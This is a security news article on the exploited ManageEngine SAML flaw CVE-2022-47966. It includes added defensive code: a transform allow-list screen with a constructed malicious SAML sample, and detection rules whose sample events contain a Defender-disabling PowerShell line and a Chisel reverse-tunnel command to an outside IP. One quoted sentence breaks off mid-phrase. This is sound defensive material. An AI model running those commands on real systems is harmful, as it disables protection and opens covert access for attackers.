The ManageEngine vulnerability is easy to exploit and enables remote code execution. Patches are available.

Users of on-premises deployments of Zoho ManageEngine products should make sure they have applied the patches for a critical remote code execution vulnerability that attackers have now started exploiting in the wild. Technical details about the flaw, along with a proof-of-concept exploit, were released late last week, which will allow more attackers to add it to their arsenals.

“The vulnerability is easy to exploit and a good candidate for attackers to ‘spray and pray’ across the Internet,” researchers with penetration testing firm Horizon3.ai said in a blog post. “This vulnerability allows for remote code execution as NT AUTHORITY\SYSTEM, essentially giving an attacker complete control over the system. If a user determines they have been compromised, additional investigation is required to determine any damage an attacker has done.”

Zoho released security updates during October and November for multiple products to address the flaw, which is now tracked as CVE-2022-47966. However, the security advisory was only published this month, and as of last week there were over 1,000 vulnerable instances of ManageEngine products directly exposed to the internet, and probably many more inside large corporate networks.

SAML ShowStopper vulnerability

The vulnerability was found by a researcher named Khoadha, a.k.a. @_l0gg, from Vietnamese firm Viettel Cyber Security, and was reported privately to Zoho through its bug bounty program in late October. When ManageEngine issued its advisory on January 10, researchers from Horizon3.ai investigated it and reverse-engineered the patch to create a working proof-of-concept exploit. After giving the community a heads-up that the flaw is very serious and easy to exploit, and sharing some IOCs that could enable exploit detection, they waited several days before publishing their findings.
Khoadha published a detailed write-up at the same time. The issue is located in old versions of xmlsec, the XML Security for Java library from the Apache Santuario open-source project. The version of the library used in ManageEngine products was over a decade old. Newer versions are not affected because of security hardening added over time, although the specific weakness Khoadha found had not been reported before.

Apache Santuario implements security standards for XML, primarily XML-Signature Syntax and Processing and XML Encryption Syntax and Processing. These are commonly used in Security Assertion Markup Language (SAML), a protocol popular in single sign-on (SSO) implementations for communication between identity providers and service providers. Enterprises use SAML to let employees use the same identity across different applications and services.

Zoho ManageEngine provides a suite of products for enterprises, many of which support SAML-based SSO. Some of the products are affected if they currently have SAML SSO enabled, while others are affected if they ever had it enabled in the past, even if they no longer do. The affected products are:

Access Manager Plus
Active Directory 360
ADAudit Plus
ADManager Plus
ADSelfService Plus
Analytics Plus
Application Control Plus
Asset Explorer
Browser Security Plus
Device Control Plus
Endpoint Central
Endpoint Central MSP
Endpoint DLP
Key Manager Plus
OS Deployer
PAM 360
Password Manager Pro
Patch Manager Plus
Remote Access Plus
Remote Monitoring and Management (RMM)
ServiceDesk Plus
ServiceDesk Plus MSP
SupportCenter Plus
Vulnerability Manager Plus

“In summary, when Apache Santuario is

Even though the research was done on ManageEngine products, Khoadha warns in his own write-up that the flaw is not limited to them, and that products from other companies that use any of the impacted versions of the library for SAML could be similarly affected. That is why he dubbed the flaw SAML ShowStopper.
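The article describes the flaw only as living in the XML-Signature processing that SAML relies on. The publicly documented root cause, which the page itself does not spell out, is that the old library applied XSLT transforms listed in a signature's Reference before it had verified the signature, so a forged, unsigned SAML Response carrying such a transform was enough. The following is an added example of mine, not code from the article, Zoho or Apache Santuario: a service-provider-side pre-screen that inspects the raw Response with a plain parser and rejects any transform an enveloped SAML assertion signature does not legitimately need. Both SAML documents are constructed, and the stylesheet in the hostile one is inert.

```python
# Added example (mine, not code from the article, Zoho or Apache Santuario).
# Pre-screen a SAML Response before any XML signature library touches it:
# every <ds:Transform> must be one an enveloped assertion signature needs.
# The sample documents below are constructed.
import xml.etree.ElementTree as ET

DS_NS = "http://www.w3.org/2000/09/xmldsig#"
XSLT_TRANSFORM = "http://www.w3.org/TR/1999/REC-xslt-19991116"

# Enveloped-signature removal plus canonicalization is all an enveloped SAML
# assertion signature needs; XPath and XSLT transforms have no place here.
ALLOWED_TRANSFORMS = {
    "http://www.w3.org/2000/09/xmldsig#enveloped-signature",
    "http://www.w3.org/2001/10/xml-exc-c14n#",
    "http://www.w3.org/2001/10/xml-exc-c14n#WithComments",
    "http://www.w3.org/TR/2001/REC-xml-c14n-20010315",
    "http://www.w3.org/TR/2001/REC-xml-c14n-20010315#WithComments",
}


def unsafe_transforms(saml_xml: str) -> list:
    """Return the Algorithm URI of every transform not on the allow-list.

    Runs on the raw document with a plain parser, so nothing inside the
    signature is evaluated. An empty list means the Response may be handed
    to the signature verifier; anything else should be rejected outright.
    """
    root = ET.fromstring(saml_xml)
    return [
        t.get("Algorithm", "<missing>")
        for t in root.iter(f"{{{DS_NS}}}Transform")
        if t.get("Algorithm") not in ALLOWED_TRANSFORMS
    ]


def is_acceptable(saml_xml: str) -> bool:
    return not unsafe_transforms(saml_xml)


def _response(transforms: str) -> str:
    """Build a constructed SAML Response around the given <ds:Transforms> body."""
    return f"""<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_resp1">
  <saml:Assertion ID="_assert1">
    <ds:Signature xmlns:ds="{DS_NS}">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
        <ds:Reference URI="#_assert1">
          <ds:Transforms>{transforms}</ds:Transforms>
          <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
          <ds:DigestValue>AAAA</ds:DigestValue>
        </ds:Reference>
      </ds:SignedInfo>
      <ds:SignatureValue>AAAA</ds:SignatureValue>
    </ds:Signature>
    <saml:Subject><saml:NameID>alice@example.test</saml:NameID></saml:Subject>
  </saml:Assertion>
</samlp:Response>"""


# Constructed: the transform list a legitimate identity provider emits.
BENIGN_RESPONSE = _response(
    '<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>'
    '<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>'
)

# Constructed: the shape of a hostile Response. The stylesheet body is inert;
# on the vulnerable library a real one is evaluated before the signature check.
HOSTILE_RESPONSE = _response(
    '<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>'
    f'<ds:Transform Algorithm="{XSLT_TRANSFORM}">'
    '<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">'
    '<xsl:template match="/"><xsl:text>evaluated before verification</xsl:text></xsl:template>'
    '</xsl:stylesheet></ds:Transform>'
)

if __name__ == "__main__":
    print("benign :", unsafe_transforms(BENIGN_RESPONSE))
    print("hostile:", unsafe_transforms(HOSTILE_RESPONSE))
```

The check is a defence-in-depth screen, not a substitute for the vendor patches: it only works because it runs on the untouched bytes before the signature library sees them, and it should sit in front of the verifier rather than inside it. The same allow-list idea is what a current XML security library enforces itself when run in its restrictive validation mode, which is worth confirming in any other SAML-consuming product that embeds an old copy of the library.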
Attackers are already exploiting the ManageEngine flaw

Researchers from security firm Rapid7 reported on January 19 that they had already responded to compromises resulting from exploitation of CVE-2022-47966. The company later updated its advisory with indicators of compromise observed in the wild, as well as the MITRE ATT&CK techniques the attackers were using post-exploitation. These include using PowerShell to disable Windows Defender and deploying a tunneling tool written in Go called Chisel.

“Our vulnerability research team found during testing that some products may be more exploitable than others: ServiceDesk Plus, for instance, is easily exploitable with public proof-of-concept code, but ADSelfService Plus requires an attacker to obtain two additional pieces of information and modify the PoC for successful exploitation,” the Rapid7 researchers said.

Security firm GreyNoise is also detecting exploitation attempts on its honeypots. Vulnerabilities that can be exploited for unauthenticated remote code execution and have a public proof-of-concept are usually adopted quickly by attackers, so the number of attacks is likely to increase. Organizations that don't directly expose any of these ManageEngine products to the internet should still apply the patches as soon as possible, because attackers can obtain network access in a variety of ways and this flaw can then be exploited for lateral movement. Many ManageEngine products are used for security, identity management and authentication, so they hold sensitive information.
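Rapid7's IOCs above describe the post-exploitation pattern (the product's Java process spawning commands, PowerShell tampering with Defender, a Chisel tunnel) without giving the exact command lines. As an added example of mine, not Rapid7's or the article's, here is hunt logic for that pattern run over constructed process-creation records with Sysmon Event ID 1 style field names. The ServiceDesk Plus install path, the Defender cmdlet invocation and the Chisel command line are my assumptions, not indicators taken from the advisory.

```python
# Added example (mine, not Rapid7's or the article's): hunt logic for the
# post-exploitation behaviour described above, run over constructed process
# creation records shaped like Sysmon Event ID 1 fields. The ManageEngine
# install path, the Defender command line and the Chisel invocation are
# assumptions, not indicators from the advisory.
import re

# ManageEngine products run as a Java service; java.exe under the product
# directory spawning a shell is the footprint of an RCE payload or web shell.
MANAGEENGINE_JAVA = re.compile(r"\\ManageEngine\\.*\\java\.exe$", re.IGNORECASE)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DEFENDER_TAMPER = re.compile(r"Set-MpPreference\s+-Disable\w+", re.IGNORECASE)
CHISEL_TUNNEL = re.compile(r"\bchisel(?:\.exe)?\b.*\b(?:client|server)\b", re.IGNORECASE)


def hunt(events):
    """Return (UtcTime, rule, CommandLine) for every rule each event trips."""
    hits = []
    for e in events:
        image_name = e["Image"].rsplit("\\", 1)[-1].lower()
        if MANAGEENGINE_JAVA.search(e["ParentImage"]) and image_name in SHELLS:
            hits.append((e["UtcTime"], "shell_from_manageengine_java", e["CommandLine"]))
        if DEFENDER_TAMPER.search(e["CommandLine"]):
            hits.append((e["UtcTime"], "defender_tamper", e["CommandLine"]))
        if CHISEL_TUNNEL.search(e["CommandLine"]) or image_name.startswith("chisel"):
            hits.append((e["UtcTime"], "chisel_tunnel", e["CommandLine"]))
    return hits


# Constructed records; the first is ordinary admin activity and must not fire.
SAMPLE_EVENTS = [
    {"UtcTime": "2023-01-20 09:12:01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Service ManageEngine*"},
    {"UtcTime": "2023-01-20 09:14:37",
     "ParentImage": r"C:\Program Files\ManageEngine\ServiceDesk\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"UtcTime": "2023-01-20 09:14:52",
     "ParentImage": r"C:\Program Files\ManageEngine\ServiceDesk\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -nop -c "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"UtcTime": "2023-01-20 09:16:10", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\Temp\chisel.exe",
     "CommandLine": "chisel.exe client 203.0.113.5:8080 R:socks"},
]

if __name__ == "__main__":
    for when, rule, cmd in hunt(SAMPLE_EVENTS):
        print(when, rule, cmd)
```

The parent-process rule is the one to tune: some ManageEngine products (endpoint management and patching in particular) legitimately launch scripts from their Java service, so baseline the product's normal child processes before alerting on every shell, and keep the Defender-tamper and Chisel rules unconditional. Because the exploit runs as NT AUTHORITY\SYSTEM, a hit on any of these should be treated as a confirmed compromise of the host rather than a suspicious event.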